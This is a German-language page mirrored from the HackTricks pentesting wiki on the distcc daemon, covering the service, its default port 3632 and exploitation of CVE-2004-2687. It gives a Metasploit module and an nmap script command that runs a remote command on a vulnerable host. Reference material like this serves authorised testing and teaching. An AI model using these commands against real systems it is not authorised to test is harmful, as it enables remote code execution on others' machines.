mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-30 06:53:11 +00:00
2.4 KiB
2.4 KiB
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merch
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.
Grundlegende Informationen
Distcc ist ein Tool, das den Kompilierungsprozess verbessert, indem es die unbenutzte Rechenleistung anderer Computer im Netzwerk nutzt. Wenn distcc auf einer Maschine eingerichtet ist, kann diese Maschine ihre Kompilierungsaufgaben an ein anderes System verteilen. Dieses Empfängersystem muss den distccd-Daemon ausführen und einen kompatiblen Compiler installiert haben, um den gesendeten Code zu verarbeiten.
Standardport: 3632
PORT STATE SERVICE
3632/tcp open distccd
Ausnutzung
Überprüfen Sie, ob es anfällig für CVE-2004-2687 ist, um beliebigen Code auszuführen:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Ich glaube nicht, dass Shodan diesen Dienst erkennt.
Ressourcen
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Beitrag erstellt von Álex B (@r1p)